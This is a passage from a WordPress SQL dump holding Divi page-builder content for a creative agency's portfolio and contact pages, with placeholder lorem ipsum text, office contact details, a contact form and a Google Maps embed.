button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Work','','publish','closed','closed','','work','','','2021-03-18 06:35:22','2021-03-18 06:35:22','',0,'https://wthtest1.in8.cdn-alpha.com/?page_id=396',0,'page','',0),(397,1,'2020-08-04 18:57:35','2020-08-04 18:57:35','<!-- wp:divi/placeholder /-->','Work','','inherit','closed','closed','','396-revision-v1','','','2020-08-04 18:57:35','2020-08-04 18:57:35','',396,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/396-revision-v1/',0,'revision','',0),(398,1,'2020-08-04 18:58:07','2020-08-04 18:58:07','','WORK','','publish','closed','closed','','398','','','2020-08-18 10:57:22','2020-08-18 10:57:22','',0,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/398/',2,'nav_menu_item','',0),(399,1,'2020-08-04 18:58:07','2020-08-04 18:58:07','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our work</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off%22\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Projects Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Project 01\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"3.27.4\" text_font=\"Montserrat|on|||\" text_text_color=\"#fcd21d\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]01\r[/et_pb_text][et_pb_cta title=\"ABC - Corporate Branding\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Project 02\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"3.27.4\" text_font=\"Montserrat|on|||\" text_text_color=\"#fcd21d\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]02\r[/et_pb_text][et_pb_cta title=\"Enkuber - App Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Project 03\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"3.27.4\" text_font=\"Montserrat|on|||\" text_text_color=\"#fcd21d\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]03\r[/et_pb_text][et_pb_cta title=\"Iqra - Business Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Project 04\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"3.27.4\" text_font=\"Montserrat|on|||\" text_text_color=\"#fcd21d\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]04\r[/et_pb_text][et_pb_cta title=\"Ninza - Branding Identity\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Work','','inherit','closed','closed','','396-revision-v1','','','2020-08-04 18:58:07','2020-08-04 18:58:07','',396,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/396-revision-v1/',0,'revision','',0),(400,1,'2020-08-04 19:00:11','2020-08-04 19:00:11','','KNOWLEDGE','','publish','closed','closed','','knowledge','','','2020-08-18 10:57:22','2020-08-18 10:57:22','',0,'https://wthtest1.in8.cdn-alpha.com/?p=400',3,'nav_menu_item','',0),(401,1,'2020-08-04 19:03:51','2020-08-04 19:03:51','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"50px||50px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.6\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>+91 9315666436</p>\n<p><a href=\"mailto:dhiraj@wthtest1.in8.cdn-alpha.com\">dhiraj@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.6\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\" locked=\"off\"]<h4>Bangalore</h4>\n&nbsp;\n\n<a href=\"mailto:bangalore@wthtest1.in8.cdn-alpha.com\">bangalore@wthtest1.in8.cdn-alpha.com</a>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.6\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" hover_enabled=\"0\" locked=\"off\"]<h4>Singapore</h4>\n<p>&nbsp;</p>\n<p><a href=\"mailto:singapore@wthtest1.in8.cdn-alpha.com\">singapore@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_code _builder_version=\"4.5.5\" _module_preset=\"default\"]<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d14008.529292925106!2d77.138047!3d28.625796!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xff75c41354d8317!2sWhatTheHell%3F%20-%20Creative%20Agency%20-%20Digital%20Agency!5e0!3m2!1sen!2sin!4v1597054958439!5m2!1sen!2sin\" width=\"100%\" height=\"450\" frameborder=\"0\" style=\"border:0;\" allowfullscreen=\"\" aria-hidden=\"false\" tabindex=\"0\"></iframe>[/et_pb_fullwidth_code][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" 